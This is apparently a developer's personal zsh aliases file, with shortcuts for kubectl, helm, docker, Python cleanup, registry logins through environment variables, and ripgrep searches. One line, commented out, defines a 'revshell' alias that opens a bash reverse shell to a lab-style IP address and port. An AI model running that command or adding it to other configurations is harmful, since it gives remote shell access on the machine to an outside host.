alias h=helm
alias brewr="arch -x86_64 brew"
alias intel="arch -x86_64"
alias k=kubectl
alias tf=terraform
alias nerdctl="lima nerdctl"
alias python=python3
alias pip=pip3
alias cat='bat'
alias vim=nvim
alias vi=nvim
alias ls=eza
alias ll='eza --long --header --group-directories-first --git --group --all --color=auto'
alias tree='tree -C'
alias lg='lazygit'
alias pinentry='pinentry-mac'
alias assume=". assume"
# Containers
alias wrk='docker run --interactive --tty --rm skandyla/wrk'
alias ubuntu='docker run --interactive --tty --rm --volume $(pwd):/host:ro ubuntu:20.04 bash'
alias docker-ip="docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'" # append container id
# Python
alias pyclean='find . | grep -E "(__pycache__|\.pyc|\.pyo$)" | xargs rm -rvf'
alias pip-purge='pip list --format freeze | xargs pip uninstall -y'
alias pip-install-reqs='ls requirements*.txt | xargs -n 1 pip install -r'
alias activate='source .venv/bin/activate'
alias awsume=". awsume"
alias login_uds_registry='login_registry "$UDS_URL" "$UDS_USERNAME" "$UDS_PASSWORD"'
alias login_ironbank='login_registry "$IRONBANK_URL" "$IRONBANK_USERNAME" "$IRONBANK_PASSWORD"'
alias login_dockerhub='login_registry "$DOCKERHUB_URL" "$DOCKERHUB_USERNAME" "$DOCKERHUB_PASSWORD"'
alias reload='source ~/.zshrc'
#alias revshell='bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'
alias serve='python3 -m http.server 8000'

####################### Ripgrep ####################
#                                                  #
# Basic enhanced search with common useful flags   #
#                                                  #
####################################################
alias rg='rg --smart-case --hidden --glob "!.git/*"'

# Code-focused search (excludes common non-code files)
alias rgc='rg --smart-case --hidden --type-not log --type-not binary --glob "!.git/*" --glob "!node_modules/*" --glob "!*.min.*" --glob "!dist/*" --glob "!build/*"'

# Search with context (shows 3 lines before/after matches)
alias rgx='rg --smart-case --hidden --context 3 --glob "!.git/*"'

# Pretty output for piping to less
alias rgp='rg --smart-case --hidden --pretty --glob "!.git/*"'

# Search in specific file types
alias rgjs='rg --smart-case --type js --type ts --type jsx --type tsx'
alias rgpy='rg --smart-case --type py'
alias rgyml='rg --smart-case --type yaml'
alias rgmd='rg --smart-case --type md'

####
# Replace grep with ripgrep
alias grep='rg'
alias egrep='rg'
alias fgrep='rg --fixed-strings'
alias rgrep='rg --recursive'
